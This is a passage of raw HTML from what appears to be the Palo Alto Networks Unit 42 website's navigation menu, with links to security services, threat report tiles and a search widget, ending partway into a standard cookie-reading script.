			<a class="title" nav-track="true" nav-track-breadcrumb="nav:unit:Services:Assess and Test Your Security Controls " href="https://www.paloaltonetworks.com/unit42/assess">Assess and Test Your Security Controls </a>
					<div class="linkColSubLinks-0e5a6285-17a3-40e5-89ca-623174944857 redesignedSublinks baseComponent parbase"><div class="base-component-spacer spacer-none  "></div>
<div class="lists" data-list-count="1">
		<ul class="list-unstyled" role="list">
					<li role="none" class="regular" data-column="1">
							<a role="listitem" href="https://www.paloaltonetworks.com/unit42/assess/ai-security-assessment" nav-track="true" nav-track-breadcrumb="nav:unit:Services:AI Security Assessment" style="">AI Security Assessment</a>
							</li>
					<li role="none" class="regular" data-column="1">
							<a role="listitem" href="https://www.paloaltonetworks.com/unit42/assess/attack-surface-assessment" nav-track="true" nav-track-breadcrumb="nav:unit:Services:Attack Surface Assessment" style="">Attack Surface Assessment</a>
							</li>
					<li role="none" class="regular" data-column="1">
							<a role="listitem" href="https://www.paloaltonetworks.com/unit42/assess/breach-readiness-review" nav-track="true" nav-track-breadcrumb="nav:unit:Services:Breach Readiness Review" style="">Breach Readiness Review</a>
							</li>
					<li role="none" class="regular" data-column="1">
							<a role="listitem" href="https://www.paloaltonetworks.com/unit42/assess/business-email-compromise" nav-track="true" nav-track-breadcrumb="nav:unit:Services:BEC Readiness Assessment" style="">BEC Readiness Assessment</a>
							</li>
					<li role="none" class="regular" data-column="1">
							<a role="listitem" href="https://www.paloaltonetworks.com/unit42/assess/cloud-security-assessment" nav-track="true" nav-track-breadcrumb="nav:unit:Services:Cloud Security Assessment" style="">Cloud Security Assessment</a>
							</li>
					<li role="none" class="regular" data-column="1">
							<a role="listitem" href="https://www.paloaltonetworks.com/unit42/assess/compromise-assessment" nav-track="true" nav-track-breadcrumb="nav:unit:Services:Compromise Assessment" style="">Compromise Assessment</a>
							</li>
					<li role="none" class="regular" data-column="1">
							<a role="listitem" href="https://www.paloaltonetworks.com/unit42/assess/cyber-risk-assessment" nav-track="true" nav-track-breadcrumb="nav:unit:Services:Cyber Risk Assessment" style="">Cyber Risk Assessment</a>
							</li>
					<li role="none" class="regular" data-column="1">
							<a role="listitem" href="https://www.paloaltonetworks.com/unit42/assess/mergers-acquisitions-cyber-due-dilligence" nav-track="true" nav-track-breadcrumb="nav:unit:Services:M&amp;A Cyber Due Diligence" style="">M&amp;A Cyber Due Diligence</a>
							</li>
					<li role="none" class="regular" data-column="1">
							<a role="listitem" href="https://www.paloaltonetworks.com/unit42/assess/penetration-testing" nav-track="true" nav-track-breadcrumb="nav:unit:Services:Penetration Testing" style="">Penetration Testing</a>
							</li>
					<li role="none" class="regular" data-column="1">
							<a role="listitem" href="https://www.paloaltonetworks.com/unit42/assess/purple-teaming" nav-track="true" nav-track-breadcrumb="nav:unit:Services:Purple Team Exercises" style="">Purple Team Exercises</a>
							</li>
					<li role="none" class="regular" data-column="1">
							<a role="listitem" href="https://www.paloaltonetworks.com/unit42/assess/ransomware-readiness-assessment" nav-track="true" nav-track-breadcrumb="nav:unit:Services:Ransomware Readiness Assessment" style="">Ransomware Readiness Assessment</a>
							</li>
					<li role="none" class="regular" data-column="1">
							<a role="listitem" href="https://www.paloaltonetworks.com/unit42/assess/soc-assessment" nav-track="true" nav-track-breadcrumb="nav:unit:Services:SOC Assessment " style="">SOC Assessment </a>
							</li>
					<li role="none" class="regular" data-column="1">
							<a role="listitem" href="https://www.paloaltonetworks.com/unit42/assess/supply-chain-risk-assessment" nav-track="true" nav-track-breadcrumb="nav:unit:Services:Supply Chain Risk Assessment" style="">Supply Chain Risk Assessment</a>
							</li>
					<li role="none" class="regular" data-column="1">
							<a role="listitem" href="https://www.paloaltonetworks.com/unit42/assess/tabletop-exercise" nav-track="true" nav-track-breadcrumb="nav:unit:Services:Tabletop Exercises" style="">Tabletop Exercises</a>
							</li>
					<li role="none" class="regular" data-column="1">
							<a role="listitem" href="https://www.paloaltonetworks.com/unit42/retainer" nav-track="true" nav-track-breadcrumb="nav:unit:Services:Unit 42 Retainer" style="">Unit 42 Retainer</a>
							</li>
					</ul>
			</div>
	</div>
</div>
	</div>
<div class="col col-list no-border  ">
		<div class="content">
			<a class="title" nav-track="true" nav-track-breadcrumb="nav:unit:Services:Transform Your Security Strategy " href="https://www.paloaltonetworks.com/unit42/transform">Transform Your Security Strategy </a>
					<div class="linkColSubLinks-aac2eccf-3f94-4094-8f00-649722622387 redesignedSublinks baseComponent parbase"><div class="base-component-spacer spacer-none  "></div>
<div class="lists" data-list-count="1">
		<ul class="list-unstyled" role="list">
					<li role="none" class="regular" data-column="1">
							<a role="listitem" href="https://www.paloaltonetworks.com/unit42/transform/incident-response-plan-development-review" nav-track="true" nav-track-breadcrumb="nav:unit:Services:IR Plan Development and Review" style="">IR Plan Development and Review</a>
							</li>
					<li role="none" class="regular" data-column="1">
							<a role="listitem" href="https://www.paloaltonetworks.com/unit42/transform/security-program-design" nav-track="true" nav-track-breadcrumb="nav:unit:Services:Security Program Design" style="">Security Program Design</a>
							</li>
					<li role="none" class="regular" data-column="1">
							<a role="listitem" href="https://www.paloaltonetworks.com/unit42/transform/vciso" nav-track="true" nav-track-breadcrumb="nav:unit:Services:Virtual CISO" style="">Virtual CISO</a>
							</li>
					<li role="none" class="regular" data-column="1">
							<a role="listitem" href="https://www.paloaltonetworks.com/unit42/transform/zero-trust-advisory" nav-track="true" nav-track-breadcrumb="nav:unit:Services:Zero Trust Advisory" style="">Zero Trust Advisory</a>
							</li>
					</ul>
			</div>
	</div>
</div>
	</div>
<div class="col col-list no-border  col-list-last">
		<div class="content">
			<a class="title" nav-track="true" nav-track-breadcrumb="nav:unit:Services:Respond in Record Time" href="https://www.paloaltonetworks.com/unit42/respond">Respond in Record Time</a>
					<div class="linkColSubLinks-056d104b-7d56-48f4-8116-649722622387 redesignedSublinks baseComponent parbase"><div class="base-component-spacer spacer-none  "></div>
<div class="lists" data-list-count="1">
		<ul class="list-unstyled" role="list">
					<li role="none" class="regular" data-column="1">
							<a role="listitem" href="https://www.paloaltonetworks.com/unit42/respond/cloud-incident-response" nav-track="true" nav-track-breadcrumb="nav:unit:Services:Cloud Incident Response" style="">Cloud Incident Response</a>
							</li>
					<li role="none" class="regular" data-column="1">
							<a role="listitem" href="https://www.paloaltonetworks.com/unit42/respond/digital-forensics" nav-track="true" nav-track-breadcrumb="nav:unit:Services:Digital Forensics" style="">Digital Forensics</a>
							</li>
					<li role="none" class="regular" data-column="1">
							<a role="listitem" href="https://www.paloaltonetworks.com/unit42/respond/incident-response" nav-track="true" nav-track-breadcrumb="nav:unit:Services:Incident Response" style="">Incident Response</a>
							</li>
					<li role="none" class="regular" data-column="1">
							<a role="listitem" href="https://www.paloaltonetworks.com/unit42/respond/managed-detection-response" nav-track="true" nav-track-breadcrumb="nav:unit:Services:Managed Detection and Response" style="">Managed Detection and Response</a>
							</li>
					<li role="none" class="regular" data-column="1">
							<a role="listitem" href="https://www.paloaltonetworks.com/unit42/respond/managed-threat-hunting" nav-track="true" nav-track-breadcrumb="nav:unit:Services:Managed Threat Hunting" style="">Managed Threat Hunting</a>
							</li>
					<li role="none" class="regular" data-column="1">
							<a role="listitem" href="https://www.paloaltonetworks.com/unit42/retainer" nav-track="true" nav-track-breadcrumb="nav:unit:Services:Unit 42 Retainer" style="">Unit 42 Retainer</a>
							</li>
					</ul>
			</div>
	</div>
</div>
	</div>
<div class="col col-tiles tile-type-brandingBackground" data-count="1" data-type="unit42">
		<div class="tile  tile-first tile-last tile-branded" data-type="unit42">
					<a href="https://www.paloaltonetworks.com/unit42/retainer" nav-track="true" nav-track-breadcrumb="nav:unit:Services::UNIT 42 RETAINER:Learn more" class="light product  brand-unit42 branded-bg">
						<div class="content">
							<div class="image ">
									<figure class="ar-">
										<img data-src="https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/logo-unit-42.svg" alt="" class="lozad ">
									</figure>
								</div>
							<div class="text">
								<div class="small-title">UNIT 42 RETAINER</div>
								<p class="display-2 description">Custom-built to fit your organization's needs, you can choose to allocate your retainer hours to any of our offerings, including proactive cyber risk management services. Learn how you can put the world-class Unit 42 Incident Response team on speed dial.</p>
								</div>
							<div class="tile-actions">
									<span class="btn btn-light">Learn more<i></i></span>
								</div>
							</div>
					</a>
					</div>
			</div>
</div>
              </li>
        <li class=" " role="menuitem">
            <a href="#" id="nav_threat-research" aria-haspopup="true" aria-expanded="false" nav-track="true" nav-track-breadcrumb="nav:unit:Unit 42 Threat Research">Unit 42 Threat Research</a>
                <div class="mega-dropdown-menu" aria-labelledby="nav_threat-research" data-type="threat-research">
                  <div class="base-component-spacer spacer-none  "></div>
<div class="mobile-inner-header" data-mobile-overview="Overview">
	<button class="btn btn-nav-back" aria-label="back to main navigation">
		<img width="20" height="20" src="https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/arrow-right-black.svg" nolozad="true" alt="black arrow pointing left to go back to main navigation">
	</button>
	<span class="title">Unit 42 Threat Research</span>
</div>

<div class="col col-list no-border col-list-first col-list-last">
		<div class="content">
			<a class="title" nav-track="true" nav-track-breadcrumb="nav:unit:Unit 42 Threat Research:Unit 42 Threat Research" href="https://unit42.paloaltonetworks.com/">Unit 42 Threat Research</a>
					<div class="linkColSubLinks-0e5a6285-17a3-40e5-89ca-623174944857 redesignedSublinks baseComponent parbase"><div class="base-component-spacer spacer-none  "></div>
<div class="lists" data-list-count="1">
		<ul class="list-unstyled" role="list">
					<li role="none" class="regular" data-column="1">
							<a role="listitem" id="prismacontainer" href="https://unit42.paloaltonetworks.com/category/threat-research/" nav-track="true" nav-track-breadcrumb="nav:unit:Unit 42 Threat Research:Threat Briefs and Assessments Details on the latest cyber threats" style="">Threat Briefs and Assessments <br><span style="font-weight:500;color:#5f5f5f;">Details on the latest cyber threats</span></a>
							</li>
					<li role="none" class="regular" data-column="1">
							<a role="listitem" id="prismacontainer" href="https://unit42.paloaltonetworks.com/tools/" nav-track="true" nav-track-breadcrumb="nav:unit:Unit 42 Threat Research:Tools Lists of public tools released by our team" style="">Tools <br><span style="font-weight:500;color:#5f5f5f;">Lists of public tools released by our team</span></a>
							</li>
					<li role="none" class="regular" data-column="1">
							<a role="listitem" href="https://www.paloaltonetworks.com/resources?q=*%3A*&amp;_charset_=UTF-8&amp;fq=PRODUCTS0_DFACET%3Apan%253Aresource-center%252Fproducts0%252Fcrypsis&amp;fq=RC_TYPE_DFACET%3Apan%253Aresource-center%252Frc-type%252Fresearch" nav-track="true" nav-track-breadcrumb="nav:unit:Unit 42 Threat Research:Threat Reports Downloadable, in-depth research reports" style="">Threat Reports <br><span style="font-weight:500;color:#5f5f5f;">Downloadable, in-depth research reports</span></a>
							</li>
					</ul>
			</div>
	</div>
</div>
	</div>
<div class="col col-tiles tile-type-image" data-count="3" data-type="unit42">
		<div class="tile  tile-first  tile-image" data-type="unit42">
					<a href="https://www.paloaltonetworks.com/resources/research/unit-42-incident-response-report" nav-track="true" nav-track-breadcrumb="nav:unit:Unit 42 Threat Research::THREAT REPORT:Read now" class="dark product  brand-unit42 custom-bg">
						<div class="content">
							<div class="text">
								<div class="small-title">THREAT REPORT</div>
								<p class="display-2 description">2024 Unit 42 Incident Response Report</p>
								</div>
							<div class="tile-actions">
									<span class="btn btn-dark">Read now<i></i></span>
								</div>
							</div>
					</a>
					<style type="text/css">
									[data-type='unit'] .mega-dropdown-menu[data-type='threat-research'] .tile-type-image .tile-image:nth-child(1) > a .content{
										background-image: url('https://www.paloaltonetworks.com/content/dam/pan/en_US/images/unit42-contained-exp/overview/unit42-nav-tile-bg.jpg');
									}
								</style>
							</div>
			<div class="tile    tile-image" data-type="unit42">
					<a href="https://unit42.paloaltonetworks.com/preparing-for-cyber-impact-russia-ukraine-crisis/" nav-track="true" nav-track-breadcrumb="nav:unit:Unit 42 Threat Research::THREAT BRIEF:Learn more" class="dark product  brand-unit42 custom-bg">
						<div class="content">
							<div class="text">
								<div class="small-title">THREAT BRIEF</div>
								<p class="display-2 description">Russia-Ukraine Cyberattacks: How to Protect Against Related Cyberthreats Including DDoS, HermeticWiper, Gamaredon, Website Defacement</p>
								</div>
							<div class="tile-actions">
									<span class="btn btn-dark">Learn more<i></i></span>
								</div>
							</div>
					</a>
					<style type="text/css">
									[data-type='unit'] .mega-dropdown-menu[data-type='threat-research'] .tile-type-image .tile-image:nth-child(2) > a .content{
										background-image: url('https://www.paloaltonetworks.com/content/dam/pan/en_US/images/unit42-contained-exp/overview/unit42-nav-tile-1-bg.jpg');
									}
								</style>
							</div>
			<div class="tile   tile-last tile-image" data-type="unit42">
					<a href="https://www.paloaltonetworks.com/resources/research/unit-42-cloud-threat-report-volume-6" nav-track="true" nav-track-breadcrumb="nav:unit:Unit 42 Threat Research::THREAT REPORT:Learn more" class="dark product  brand-unit42 custom-bg">
						<div class="content">
							<div class="text">
								<div class="small-title">THREAT REPORT</div>
								<p class="display-2 description">Highlights from the Unit 42 Cloud Threat Report, Volume 6</p>
								</div>
							<div class="tile-actions">
									<span class="btn btn-dark">Learn more<i></i></span>
								</div>
							</div>
					</a>
					<style type="text/css">
									[data-type='unit'] .mega-dropdown-menu[data-type='threat-research'] .tile-type-image .tile-image:nth-child(3) > a .content{
										background-image: url('https://www.paloaltonetworks.com/content/dam/pan/en_US/images/unit42-contained-exp/overview/unit42-nav-tile-2-bg.jpg');
									}
								</style>
							</div>
			</div>
</div>
              </li>
        <li class=" " role="menuitem">
            <a href="#" id="nav_partners" aria-haspopup="true" aria-expanded="false" nav-track="true" nav-track-breadcrumb="nav:unit:Partners">Partners</a>
                <div class="mega-dropdown-menu" aria-labelledby="nav_partners" data-type="partners">
                  <div class="base-component-spacer spacer-none  "></div>
<div class="mobile-inner-header" data-mobile-overview="Overview">
	<button class="btn btn-nav-back" aria-label="back to main navigation">
		<img width="20" height="20" src="https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/arrow-right-black.svg" nolozad="true" alt="black arrow pointing left to go back to main navigation">
	</button>
	<span class="title">Partners</span>
</div>

<div class="col col-list no-border col-list-first col-list-last">
		<div class="content">
			<div class="title" nav-track="true" nav-track-breadcrumb="nav:unit:Partners:Partners">Partners</div>
					<div class="linkColSubLinks-0e5a6285-17a3-40e5-89ca-623174944857 redesignedSublinks baseComponent parbase"><div class="base-component-spacer spacer-none  "></div>
<div class="lists" data-list-count="1">
		<ul class="list-unstyled" role="list">
					<li role="none" class="regular" data-column="1">
							<a role="listitem" href="https://www.paloaltonetworks.com/unit42/threat-intelligence-partners" nav-track="true" nav-track-breadcrumb="nav:unit:Partners:Threat Intelligence Sharing" style="">Threat Intelligence Sharing</a>
							</li>
					<li role="none" class="regular" data-column="1">
							<a role="listitem" href="https://www.paloaltonetworks.com/unit42/incident-response-partners" nav-track="true" nav-track-breadcrumb="nav:unit:Partners:Law Firms and Insurance Providers" style="">Law Firms and Insurance Providers</a>
							</li>
					</ul>
			</div>
	</div>
</div>
	</div>
<div class="col col-tiles tile-type-image" data-count="3" data-type="unit42">
		<div class="tile  tile-first  tile-image" data-type="unit42">
					<a href="https://start.paloaltonetworks.com/unit-42-ransomware-threat-report.html" target="_blank" nav-track="true" nav-track-breadcrumb="nav:unit:Partners::THREAT REPORT:Learn more" class="dark product  brand-unit42 custom-bg" rel="noopener">
						<div class="content">
							<div class="text">
								<div class="small-title">THREAT REPORT</div>
								<p class="display-2 description">2022 Unit 42 Ransomware Threat Report: Understand trends and tactics to bolster defenses</p>
								</div>
							<div class="tile-actions">
									<span class="btn btn-dark">Learn more<i></i></span>
								</div>
							</div>
					</a>
					<style type="text/css">
									[data-type='unit'] .mega-dropdown-menu[data-type='partners'] .tile-type-image .tile-image:nth-child(1) > a .content{
										background-image: url('https://www.paloaltonetworks.com/content/dam/pan/en_US/images/unit42-contained-exp/overview/unit42-nav-tile-1-bg.jpg');
									}
								</style>
							</div>
			<div class="tile    tile-image" data-type="unit42">
					<a href="https://unit42.paloaltonetworks.com/preparing-for-cyber-impact-russia-ukraine-crisis/" nav-track="true" nav-track-breadcrumb="nav:unit:Partners::THREAT BRIEF:Learn more" class="dark product  brand-unit42 custom-bg">
						<div class="content">
							<div class="text">
								<div class="small-title">THREAT BRIEF</div>
								<p class="display-2 description">Russia-Ukraine Cyberattacks: How to Protect Against Related Cyberthreats Including DDoS, HermeticWiper, Gamaredon, Website Defacement</p>
								</div>
							<div class="tile-actions">
									<span class="btn btn-dark">Learn more<i></i></span>
								</div>
							</div>
					</a>
					<style type="text/css">
									[data-type='unit'] .mega-dropdown-menu[data-type='partners'] .tile-type-image .tile-image:nth-child(2) > a .content{
										background-image: url('https://www.paloaltonetworks.com/content/dam/pan/en_US/images/unit42-contained-exp/overview/unit42-nav-tile-bg.jpg');
									}
								</style>
							</div>
			<div class="tile   tile-last tile-image" data-type="unit42">
					<a href="https://unit42.paloaltonetworks.com/operation-falcon-ii-silverterrier-nigerian-bec/" nav-track="true" nav-track-breadcrumb="nav:unit:Partners::THREAT BRIEF:Learn more" class="dark product  brand-unit42 custom-bg">
						<div class="content">
							<div class="text">
								<div class="small-title">THREAT BRIEF</div>
								<p class="display-2 description">Operation Falcon II: Unit 42 Helps Interpol Identify Nigerian Business Email Compromise Ring Members</p>
								</div>
							<div class="tile-actions">
									<span class="btn btn-dark">Learn more<i></i></span>
								</div>
							</div>
					</a>
					<style type="text/css">
									[data-type='unit'] .mega-dropdown-menu[data-type='partners'] .tile-type-image .tile-image:nth-child(3) > a .content{
										background-image: url('https://www.paloaltonetworks.com/content/dam/pan/en_US/images/unit42-contained-exp/overview/unit42-nav-tile-3-bg.jpg');
									}
								</style>
							</div>
			</div>
</div>
              </li>
        <li class=" " role="menuitem">
            <a href="#" id="nav_resources" aria-haspopup="true" aria-expanded="false" nav-track="true" nav-track-breadcrumb="nav:unit:Resources">Resources</a>
                <div class="mega-dropdown-menu" aria-labelledby="nav_resources" data-type="resources">
                  <div class="base-component-spacer spacer-none  "></div>
<div class="mobile-inner-header" data-mobile-overview="Overview">
	<button class="btn btn-nav-back" aria-label="back to main navigation">
		<img width="20" height="20" src="https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/arrow-right-black.svg" nolozad="true" alt="black arrow pointing left to go back to main navigation">
	</button>
	<span class="title">Resources</span>
</div>

<div class="col col-list no-border col-list-first ">
		<div class="content">
			<div class="title" nav-track="true" nav-track-breadcrumb="nav:unit:Resources:Resources">Resources</div>
					<div class="linkColSubLinks-532098124-31tyatye-1419 redesignedSublinks baseComponent parbase"><div class="base-component-spacer spacer-none  "></div>
<div class="lists" data-list-count="1">
		<ul class="list-unstyled" role="list">
					<li role="none" class="regular" data-column="1">
							<a role="listitem" href="https://www.paloaltonetworks.com/resources?q=*%3A*&amp;_charset_=UTF-8&amp;fq=PRODUCTS0_DFACET%3Apan%253Aresource-center%252Fproducts0%252Fcrypsis&amp;fq=RC_TYPE_DFACET%3Apan%253Aresource-center%252Frc-type%252Fresearch" nav-track="true" nav-track-breadcrumb="nav:unit:Resources:Research Reports" style="">Research Reports</a>
							</li>
					<li role="none" class="regular" data-column="1">
							<a role="listitem" href="https://www.paloaltonetworks.com/resources?q=*%3A*&amp;_charset_=UTF-8&amp;fq=PRODUCTS0_DFACET%3Apan%253Aresource-center%252Fproducts0%252Fcrypsis&amp;fq=RC_TYPE_DFACET%3Apan%253Aresource-center%252Frc-type%252Fwebinar" nav-track="true" nav-track-breadcrumb="nav:unit:Resources:Webinars" style="">Webinars</a>
							</li>
					<li role="none" class="regular" data-column="1">
							<a role="listitem" href="https://www.paloaltonetworks.com/unit42/customer-stories" nav-track="true" nav-track-breadcrumb="nav:unit:Resources:Customer Stories" style="">Customer Stories</a>
							</li>
					<li role="none" class="regular" data-column="1">
							<a role="listitem" href="https://www.paloaltonetworks.com/resources?q=*%3A*&amp;_charset_=UTF-8&amp;fq=PRODUCTS0_DFACET%3Apan%253Aresource-center%252Fproducts0%252Fcrypsis&amp;fq=RC_TYPE_DFACET%3Apan%253Aresource-center%252Frc-type%252Fdatasheet" nav-track="true" nav-track-breadcrumb="nav:unit:Resources:Datasheets" style="">Datasheets</a>
							</li>
					<li role="none" class="regular" data-column="1">
							<a role="listitem" href="https://www.paloaltonetworks.com/resources?q=*%3A*&amp;_charset_=UTF-8&amp;fq=PRODUCTS0_DFACET%3Apan%253Aresource-center%252Fproducts0%252Fcrypsis&amp;fq=RC_TYPE_DFACET%3Apan%253Aresource-center%252Frc-type%252Fvideo" nav-track="true" nav-track-breadcrumb="nav:unit:Resources:Videos" style="">Videos</a>
							</li>
					<li role="none" class="regular" data-column="1">
							<a role="listitem" href="https://www.paloaltonetworks.com/resources?q=*%3A*&amp;_charset_=UTF-8&amp;fq=PRODUCTS0_DFACET%3Apan%253Aresource-center%252Fproducts0%252Fcrypsis&amp;fq=RC_TYPE_DFACET%3Apan%253Aresource-center%252Frc-type%252Finfographic" nav-track="true" nav-track-breadcrumb="nav:unit:Resources:Infographics" style="">Infographics</a>
							</li>
					<li role="none" class="regular" data-column="1">
							<a role="listitem" href="https://www.paloaltonetworks.com/resources?q=*%3A*&amp;_charset_=UTF-8&amp;fq=PRODUCTS0_DFACET%3Apan%253Aresource-center%252Fproducts0%252Fcrypsis&amp;fq=RC_TYPE_DFACET%3Apan%253Aresource-center%252Frc-type%252Fwhitepaper" nav-track="true" nav-track-breadcrumb="nav:unit:Resources:Whitepapers" style="">Whitepapers</a>
							</li>
					<li role="none" class="regular" data-column="1">
							<a role="listitem" href="https://www.paloaltonetworks.com/resources?q=*%3A*&amp;_charset_=UTF-8&amp;fq=PRODUCTS0_DFACET%3Apan%253Aresource-center%252Fproducts0%252Fcrypsis&amp;fq=RC_TYPE_DFACET%3Apan%253Aresource-center%252Frc-type%252Farticle" nav-track="true" nav-track-breadcrumb="nav:unit:Resources:Cyberpedia" style="">Cyberpedia</a>
							</li>
					</ul>
			</div>
	</div>
</div>
	</div>
<div class="col col-list no-border  col-list-last">
		<div class="content">
			<div class="title" nav-track="true" nav-track-breadcrumb="nav:unit:Resources:Industries">Industries</div>
					<div class="linkColSubLinks-b0db96f1-ab66-4a77-a4bd-649723555853 redesignedSublinks baseComponent parbase"><div class="base-component-spacer spacer-none  "></div>
<div class="lists" data-list-count="1">
		<ul class="list-unstyled" role="list">
					<li role="none" class="regular" data-column="1">
							<a role="listitem" href="https://www.paloaltonetworks.com/industry/unit42-financial-services" nav-track="true" nav-track-breadcrumb="nav:unit:Resources:Financial Services" style="">Financial Services</a>
							</li>
					<li role="none" class="regular" data-column="1">
							<a role="listitem" href="https://www.paloaltonetworks.com/industry/unit42-healthcare" nav-track="true" nav-track-breadcrumb="nav:unit:Resources:Healthcare" style="">Healthcare</a>
							</li>
					<li role="none" class="regular" data-column="1">
							<a role="listitem" href="https://www.paloaltonetworks.com/industry/unit42-manufacturing" nav-track="true" nav-track-breadcrumb="nav:unit:Resources:Manufacturing" style="">Manufacturing</a>
							</li>
					</ul>
			</div>
	</div>
</div>
	</div>
<div class="col col-tiles tile-type-image" data-count="2" data-type="unit42">
		<div class="tile  tile-first  tile-image" data-type="unit42">
					<a href="https://start.paloaltonetworks.com/forrester-wave-incident-response" target="_blank" nav-track="true" nav-track-breadcrumb="nav:unit:Resources::ANALYST REPORT:Get the report" class="dark product  brand-unit42 custom-bg" rel="noopener">
						<div class="content">
							<div class="text">
								<div class="small-title">ANALYST REPORT</div>
								<p class="display-2 description">Unit 42® has been named a Leader in “The Forrester Wave™: Cybersecurity Incident Response Services, Q2 2024.” Read the Forrester report to learn why.</p>
								</div>
							<div class="tile-actions">
									<span class="btn btn-dark">Get the report<i></i></span>
								</div>
							</div>
					</a>
					<style type="text/css">
									[data-type='unit'] .mega-dropdown-menu[data-type='resources'] .tile-type-image .tile-image:nth-child(1) > a .content{
										background-image: url('https://www.paloaltonetworks.com/content/dam/pan/en_US/images/unit42-contained-exp/unit-42_IR-forrester-wave-report-2024_navigation-card_372x532_option2_copy-placement.jpg');
									}
								</style>
							</div>
			<div class="tile   tile-last tile-image" data-type="unit42">
					<a href="https://www.paloaltonetworks.com/resources/ebooks/unit42-threat-frontier" nav-track="true" nav-track-breadcrumb="nav:unit:Resources::THREAT REPORT:Get the report" class="dark product  brand-unit42 custom-bg">
						<div class="content">
							<div class="text">
								<div class="small-title">THREAT REPORT</div>
								<p class="display-2 description">Unit 42 Threat Frontier Report: Discover the latest insights on how threat actors are leveraging GenAI to exploit vulnerabilities — and learn what steps you can take to protect yourself.</p>
								</div>
							<div class="tile-actions">
									<span class="btn btn-dark">Get the report<i></i></span>
								</div>
							</div>
					</a>
					<style type="text/css">
									[data-type='unit'] .mega-dropdown-menu[data-type='resources'] .tile-type-image .tile-image:nth-child(2) > a .content{
										background-image: url('https://www.paloaltonetworks.com/content/dam/pan/en_US/images/unit42/ai-powered-threats-nav-updated.jpg');
									}
								</style>
							</div>
			</div>
</div>
              </li>
        </ul>
      <ul class="nav-right" aria-label="right" role="list">
        <li class="search" role="listitem">
          <a href="#" nav-track="true" nav-track-breadcrumb="nav:unit:Search" aria-label="search"></a>
        </li>
        <li class="cta" role="listitem">
          <a href="https://start.paloaltonetworks.com/contact-unit42.html" target="_blank" class="btn btn-primary" nav-track="true" nav-track-breadcrumb="nav:unit:Under Attack?" rel="noopener">Under Attack?</a>
        </li>
      </ul>
    </div>
    <div class="mobile-bottom">
      <a href="#" onclick="gotolp();" class="pan-home" nav-track="true" nav-track-breadcrumb="nav:unit:panw">
        <img width="33" height="26" src="https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/logo-default.svg" nolozad="true" alt="palo alto networks logo icon">
        <img class="back-arrow" width="16" height="16" src="https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/arrow-right-white.svg" nolozad="true" alt="white arrow icon pointing left to return to main Palo Alto Networks site">
      </a>
    </div>
  </nav>
  <div class="dropdown-overlay"></div>
  <!-- coveo search -->
  <div class="pan-nav-search">
    <div class="searchReference reference parbase"><div class="cq-dd-paragraph"><div class="mainParsys parsys"><div class="coveosearch baseComponent parbase section"><style panwcombine="true">
.coveo-visible-to-screen-reader-only {
	position: absolute;
    left: -10000px;
    width: 1px;
    height: 1px;
    overflow: hidden;
}
</style>
<script panwcombine="true">
var Coveo_organizationId = "paloaltonetworksintranet";
var searchResultsPagePath = "/content/pan/en_US/search/unit42search";
var techDocsPagePath = "https://docs.paloaltonetworks.com/search#q=unit%2042&sort=relevancy&layout=card&numberOfResults=25";

</script>

	<!-- Each DOM element with a class starting with "Coveo" (uppercase) will instantiate a component. Remove padding later while integration-->
<div id="coveosearch" class="CoveoSearchInterface pan-search-coveo" data-results-per-page="4" data-pipeline="WWW Unit42 Site Search" data-expression="" data-auto-trigger-query="true">
  <div class="pan-search-coveo-header">
    <div class="container">

      <div class="hidden-xs logo-placeholder"></div>

      <span class="visible-lg visible-md searchtext">Search</span>
        <span class="searchIconHeader hidden"><svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 17 17" style="enable-background:new 0 0 17 17;" xml:space="preserve" aria-hidden="true">
        <path d="M13.5,7.3c0,3.5-2.8,6.2-6.2,6.2C3.8,13.5,1,10.7,1,7.3C1,3.8,3.8,1,7.3,1C10.7,1,13.5,3.8,13.5,7.3z M16,16
        l-4.3-4.3"></path>
      </svg></span>

      <div class="coveo-container">
		<div class="dropdown">
    	      <button class="btn btn-default dropdown-toggle" type="button" id="dropdownMenu1" data-toggle="dropdown" aria-haspopup="true" aria-expanded="true">
        	    All
                <span class="caretnew">
                                    <svg width="11" height="7" viewBox="0 0 11 7" fill="none" xmlns="http://www.w3.org/2000/svg" aria-hidden="true">
                                    <path d="M1 1L5.5 5.5L10 1" stroke="black" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"></path>
                                    </svg>
                                </span>
                </button>
          		<ul class="dropdown-menu" aria-labelledby="dropdownMenu1">
            		<li><a href="https://docs.paloaltonetworks.com/search#q=unit%2042&amp;sort=relevancy&amp;layout=card&amp;numberOfResults=25" id="tech-docs" rel="nofollow" data-page-track="true" data-page-track-value="_jcr_content:cleanheaderunitunitrenderer: section:">Tech Docs</a></li>
          		</ul>
        	</div>
		<!-- Note that any Coveo component can be removed (or added); none is actually required for the page to load. -->
        <div class="CoveoSearchbox" role="search" data-enable-search-as-you-type="false" data-enable-omnibox="true" data-omnibox-timeout="1000" data-enable-query-suggest-addon="true" data-trigger-query-on-clear="true" id="pan-coveo-input"></div>
	        	</div>

      <button class="btn btn-link btn-close-pan-search" aria-label="Close Search modal">
                <svg width="17" height="18" viewBox="0 0 17 18" fill="none" xmlns="http://www.w3.org/2000/svg" aria-labelledby="closeSearchModal2">
                        <title id="closeSearchModal2">Close search modal</title>
                        <line x1="1.5" y1="-1.5" x2="18.3323" y2="-1.5" transform="matrix(0.70711 -0.707104 0.70711 0.707104 1.97656 17.0236)" stroke="black" stroke-width="3" stroke-linecap="round"></line>
                        <line x1="1.5" y1="-1.5" x2="18.3323" y2="-1.5" transform="matrix(-0.707106 -0.707107 -0.707106 0.707107 14.0234 17.0236)" stroke="black" stroke-width="3" stroke-linecap="round"></line>
                   </svg>
                </button>
    </div>
  </div>

   </div>
</div>
</div>
</div></div>
</div>
  <!-- end coveo search -->
</div>
</div>
  </div>
<div class="cleanTopHtml htmlComp baseComponent parbase"><div class="base-component-spacer spacer-none  "></div>
</div>
</div>
<!--  Start: Scripts Migrated From Unit42-v5 -->
<script type="text/javascript">
	function getCookie(cname) {
	 	var name = cname + "=";
  		var decodedCookie = decodeURIComponent(document.cookie);
		var ca = decodedCookie.split(';');
  		for(var i = 0; i <ca.length; i++) {
    			var c = ca[i];
    			while (c.charAt(0) == ' ') {
     				 c = c.substring(1);
